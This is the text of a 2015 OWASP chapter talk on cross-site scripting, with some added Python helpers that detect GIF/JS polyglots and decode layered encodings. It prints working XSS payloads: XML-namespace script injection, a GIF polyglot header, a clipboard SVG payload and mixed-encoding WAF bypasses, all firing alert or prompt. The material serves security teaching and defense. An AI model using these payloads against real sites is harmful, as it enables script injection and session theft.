Yurii Bilyk | 2015
XSS: DO YOU KNOW EVERYTHING?
WHO AM I
# root
• WE are Penetration Testers
• WE are Security Professionals
• WE are OWASP Lviv Chapter
• WE are Legio… oops
blog: http://owasp-lviv.blogspot.com
skype: y.bilyk
TEAM
AGENDA
- Power of XSS
- Read HttpOnly Cookies
- XSS via XML and GIF
- Clipboard XSS
- WAF XSS Bypass
Power of JavaScript
Modern WEB (Angular, jQuery)
Mobile APPS (PhoneGap)
Browser Performance (V8)
Servers also use it (Node.js)
Just an ALERT?
Red Alert!!!
What can XSS do?
CSRF and ClickJacking
XSS Tunnel & Port Scanning
Exploit machines & Botnets
And other BAD things (BeeF)
• Real payloads:
– http://www.xss-payloads.com
• BeeF Presentation:
– http://t.co/NLHtrxEuZ0
What can XSS do? (Links)
Types of XSS
Reflected XSS
Stored XSS
DOM Based XSS
Mutation XSS
Breaking Rules
Who cares…
• Two ways to modify DOM:
–DOM Direct Manipulation
–Using innerHTML
innerHTML
<script type="text/javascript">
// "new" is a reserved word in JavaScript, so the slide's variable name would not parse
var newText = "New <b>second</b> text";
function Change() {
  // innerHTML re-parses the string as HTML markup: the <b> becomes a real element
  document.getElementById("myPar").innerHTML = newText;
}
</script>
<p id="myPar">First text</p>
<a href="javascript:Change()">Change text above!</a>
Example of innerHTML
Mutation XSS (Basics)
Web browsers tolerate wrong HTML syntax.
This can cause very interesting behaviour.
In some cases a "safe" payload can be transformed into an XSS injection.
Example of HTML mutation
Original data:           <s class="">hello&#x20;<b>goodbye</b>
Mutated data by browser: <S>hello <B>goodbye</B></S>
Example of HTML mutation (JS)
Original data:           <img src="test.jpg" alt="``onload=xss()"/>
Mutated data by browser: <IMG alt=``onload=xss() src="test.jpg">
Mutation XSS (Some Examples)
Original data:           <p style="font-family:'223bx:expression(alert(1))/*'">
Mutated data by browser: <P style="FONT-FAMILY: ; x: expression(alert(1))"></P>
Mutation XSS (Some Examples)
Original data:           <article xmlns="x:img src=x onerror=alert(1)">
Mutated data by browser: <img src=x onerror=alert(1) :article xmlns="x:img src=x onerror=alert(1)"></img src=x onerror=alert(1) :article>
Mutation XSS (Links)
https://cure53.de/fp170.pdf
Everybody Lies
Really, everybody
HttpOnly Ideal World
JavaScript CAN’T
read HttpOnly Cookies
HttpOnly XSS
Apache before 2.2.22 incorrectly processes long cookies.
The generated error page contains ALL cookies from the request.
We can cause such an error and read the response HTML via XSS.
HttpOnly XSS
HttpOnly XSS (Exploit)
https://goo.gl/kQ1mAo
Trust ME, I'm from the internet
The Phantom Menace
• JS can be run only from HTML?
–NO
• XML can contain valid JS?
–YES
So just run JS from XML
XSS in XML?
• We can insert HTML tags as CDATA
–But this is JUST text in the browser view
• We can insert a valid XML element and
declare the (X)HTML namespace for the data
inside this tag
(X)HTML in XML
XML Namespace (Basics)
• XML Namespaces provide a method to avoid element
name conflicts (e.g. when joining two XML documents)
<table>
<tr>
<td>Apples</td>
<td>Bananas</td>
</tr>
</table>
<table>
<name>Coffee</name>
<width>80</width>
<length>120</length>
</table>
XML Namespace (Conflicts)
• Name conflicts in XML can easily be avoided using a
name prefix (h: and f:)
<h:table>
<h:tr>
<h:td>Apples</h:td>
<h:td>Bananas</h:td>
</h:tr>
</h:table>
<f:table>
<f:name>Coffee</f:name>
<f:width>80</f:width>
<f:length>120</f:length>
</f:table>
XSS in XML (Payload)
<x:script
xmlns:x=
"http://www.w3.org/1999/xhtml">
alert('XSS');
</x:script>
XSS in XML?
How does it work?
The browser's first decision is based
on the content type of the document.
XML allows us to define a
namespace (for example (X)HTML).
BINGO! The browser executes part
of the XML as (X)HTML (like SVG).
Look Deeper
It’s obvious, isn’t it?
GIF File Format
ASCII:  GIF87a .. ). ......
HEX:    47 49 46 38 37 61 fa 00 29 01 e7 00 00 ff ff ff
        HEADER             X     Y     SIZE     IMG DATA
XSS GIF File Format
ASCII:  GIF87a /* ). ......
HEX:    47 49 46 38 37 61 fa 00 29 01 e7 00 00 ff ff ff
        HEADER             X     Y     SIZE     IMG DATA
XSS GIF File Format (Final)
GIF87a/*).......
GIF87a/*).......*/=0;
GIF87a/*).......*/=0;alert('XSS')
XSS in GIF?
How does it work?
The JavaScript interpreter works only
with ASCII symbols.
We need to modify some
non-printable symbols in the image
header (to create valid JS syntax).
Inject JavaScript code into the image.
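An added example (Python, not from the slides) that parses the header bytes shown above and spots the polyglot shape the slides describe. CLEAN_HEADER reproduces the slide's 16 bytes; POLYGLOT_HEADER is constructed by overwriting the width field with "/*" and appending a closing tail; the function names are assumptions.

```python
import struct

# Constructed from the 16 header bytes on the slide: "GIF87a", a 250 x 297
# logical screen (little-endian width and height), packed flags and colours.
CLEAN_HEADER = bytes.fromhex("474946383761fa002901e70000ffffff")
# Constructed polyglot in the shape the slide describes: the width bytes are
# overwritten with the printable pair "/*" and a JS tail closes the comment.
POLYGLOT_HEADER = b"GIF87a/*" + CLEAN_HEADER[8:] + b"*/=0;alert('XSS')"

def parse_gif_header(data):
    """Return (signature, width, height, packed, bg_index, aspect) from the
    6-byte signature plus 7-byte logical screen descriptor, or raise ValueError."""
    if len(data) < 13 or data[:6] not in (b"GIF87a", b"GIF89a"):
        raise ValueError("not a GIF header")
    width, height, packed, bg_index, aspect = struct.unpack("<HHBBB", data[6:13])
    return data[:6].decode("ascii"), width, height, packed, bg_index, aspect

def looks_like_js_polyglot(data):
    """True when the width field spells a JS comment opener and a matching
    closer appears later: the footprint of the GIF/JS trick on the slides.
    The width still parses (0x2a2f = 10799 px), so image decoders accept it."""
    parse_gif_header(data)  # must at least be a structurally valid GIF
    return data[6:8] == b"/*" and b"*/" in data[8:]
```

Serving uploads with the correct Content-Type and X-Content-Type-Options: nosniff stops browsers from running them as scripts, and re-encoding uploaded images server-side destroys the construction entirely.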
Just Copy & Paste
It's not rocket science!?
Clipboard (Basics)
Clipboard operations are not
simple memory copy operations.
Data loaded from the clipboard
depends on the destination (Notepad).
Data stored in the clipboard
depends on the source (MS Word).
Clipboard XSS (How?)
Edit a font style in the document
(DOC, ODT, PDF, etc.).
Type/create some text with the new
font style in this document.
Copy this text and paste it into a
text area on the victim site.
</style><svg><style>svg {position:fixed}</style>
<style>svg {top:0}</style><style>svg {left:0}</style>
<style>svg {height:10000px}</style> <style>svg
{width:10000px}</style> <style>svg {opacity:0}</style>
<a xmlns:xlink="http://www.w3.org/1999/xlink"
xlink:href="?"><circle r="4000"></circle>
<animate attributeName="xlink:href" begin="0"
from="javascript:alert(document.domain)"
to="&" /> </a>
Clipboard XSS (Filter Bypass)
Clipboard XSS
Clipboard XSS (Links)
http://goo.gl/yKgWPy
We’ll save YOU
Probably..
WAF (Basics)
Most WAFs are signature based.
WAF rules are based on RegExp.
A black list is used.
WAF XSS Bypass (Techniques)
Mixed Encoding
(Double, HTML, URL encoding)
Rarely used events of objects
and new HTML5 objects
JS-F**K Encoding
WAF XSS Bypass (Payloads)
URL Encoding + HTML Encoding + Unicode Encoding
%3Cimg%2Fsrc%3D%22x%22%2Fonerror%3D%22prom%5Cu0070t%2526%2523x28%3B%2526%2523x27%3B%2526%2523x58%3B%2526%2523x53%3B%2526%2523x53%3B%2526%2523x27%3B%2526%2523x29%3B%22%3E
<img/src="x"/onerror="prompt('XSS');">
WAF XSS Bypass (Payloads)
Rare object events
<details ontoggle=alert(1)>
<div contextmenu="xss">Right-Click Here
<menu id="xss" onshow="alert(1)">
WAF XSS Bypass (Payloads)
JS-F**K Encoding
<img/src="x"/onerror="alert(1)">
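An added example (Python, not from the slides) showing why the encoding and rare-event bypasses above work against a signature black list, and what a normalization step changes. MIXED is the slide's encoded payload; NAIVE_RULE and GENERIC_RULE are constructed rules, not any real WAF's signatures.

```python
import html
import re
import urllib.parse

# Constructed from the slide's payload (stray spaces from the slide removed):
# URL encoding, a second URL-encoding layer over HTML entities, and a \u escape.
MIXED = ("%3Cimg%2Fsrc%3D%22x%22%2Fonerror%3D%22prom%5Cu0070t"
         "%2526%2523x28%3B%2526%2523x27%3B%2526%2523x58%3B%2526%2523x53%3B"
         "%2526%2523x53%3B%2526%2523x27%3B%2526%2523x29%3B%22%3E")
RARE_EVENT = "<details ontoggle=alert(1)>"   # the rarely used event from the slide

# A black-list rule of the kind the slides describe: a fixed list of well-known
# handlers followed by a literal call to a JS dialog function.
NAIVE_RULE = re.compile(
    r"on(error|load|click|mouseover)\s*=\s*[\"']?\s*(alert|prompt|confirm)\s*\(", re.I)
# A structural rule: any on* attribute at all, whatever the handler name.
GENERIC_RULE = re.compile(r"\bon[a-z]+\s*=", re.I)

def js_unicode_unescape(s):
    """Turn JavaScript \\uXXXX escapes back into characters."""
    return re.sub(r"\\u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)

def normalize(s, max_rounds=5):
    """Peel URL, HTML-entity and \\u encodings repeatedly until the string stops
    changing, so every layer of the mixed encoding is gone before matching."""
    for _ in range(max_rounds):
        before = s
        s = js_unicode_unescape(html.unescape(urllib.parse.unquote(s)))
        if s == before:
            break
    return s

def matches(rule, s):
    """True when the rule fires on s exactly as given (no normalization)."""
    return rule.search(s) is not None

# JS-F**K payloads contain no encoding to peel at all; they need structural
# detection, which is one more reason signature black lists stay fragile.
```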
WAF XSS Bypass (Links)
https://goo.gl/hQcPJf
Questions?
Fly you fools
XSS - Do you know EVERYTHING?

Editor's Notes

  1. An HTML element’s innerHTML property deals with creating HTML content from arbitrarily formatted strings on write access on the one hand, and with serializing HTML DOM nodes into strings on read access on the other